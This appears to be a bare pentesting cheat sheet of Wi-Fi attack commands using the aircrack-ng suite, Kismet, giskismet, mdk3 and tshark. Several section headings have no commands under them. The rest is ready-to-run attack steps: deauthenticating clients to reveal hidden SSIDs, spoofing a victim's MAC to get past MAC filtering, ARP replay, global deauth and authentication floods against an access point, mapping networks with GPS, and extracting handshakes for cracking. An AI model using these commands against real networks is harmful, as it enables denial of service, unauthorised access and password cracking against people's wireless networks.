Wifi - Additional Tricks and Tools
Additional Aircrack-NG Tools
Remove Wireless Headers
Decrypt a WEP encrypted capture file
Decrypt a WPA2 encrypted capture file
Remote Aircrack Suite
airmon-ng start wlan0 3
airserv-ng -p 1337 -c 3 -d mon0
airodump-ng -c 3 --bssid $AP_MAC $HOST:$PORT
Wireless Intrusion Detection System
Require wireless key and bssid
airmon-ng start wlan0 3
# create the at0 interface
airtun-ng -a $AP_MAC -w $WEP_KEY mon0
# the interface will auto decrypt packets
Wireless Reconnaissance
Use CSV file from airodump
CAPR Graph
airgraph-ng -i wifu-01.csv -g CAPR -o wifu-capr.png
# color
- green: wpa
- yellow: wep
- red: open
- black: unknown
CPG - Client Probe Graph
Kismet
kismet
[enter][enter]
[tab][close]
# Select a source and begin a monitoring
Kismet > Add source > wlan0 > Add
.nettxt: data
.pcapdump: wireshark format
# giskismet: kismet inside a SQL database
> require a GPS receiver
gpsd -n -N -D4 /dev/ttyUSB0
-N : foreground
-D : debugging level
# kismet will gather SSID and GPS location
giskismet -x kismet.netxml
# generate a kml file (Google Earth)
giskismet -q "select * from wireless" -o allaps.kml
giskismet -q "select * from wireless where Encryption='WEP'" -o wepaps.kml
Other things
# Find Hidden SSID
aireplay-ng -0 20 –a <BSSID> -c <VictimMac> mon0
# Mac Filtering
macchanger –-mac <VictimMac> wlan0mon
aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
# MAC CHANGER
ifconfig wlan0mon down
macchanger –-mac <macVictima> wlan0mon
ifconfig wlan0mon up
# Deauth Global
aireplay-ng -0 0 -e hacklab -c FF:FF:FF:FF:FF:FF wlan0mon
# Authentication DoS Mode
mdk3 wlan0mon a -a $AP_MAC
# Tshark - Filter and dislay data
tshark -r Captura-02.cap -Y "eapol" 2>/dev/null
tshark -i wlan0mon -Y "wlan.fc.type_subtype==4" 2>/dev/null
tshark -r Captura-02.cap -Y "(wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol) && wlan.addr==20:34:fb:b1:c5:53" 2>/dev/null
# Convert .cap with handshake to .hccap
aircrack-ng -J network network.cap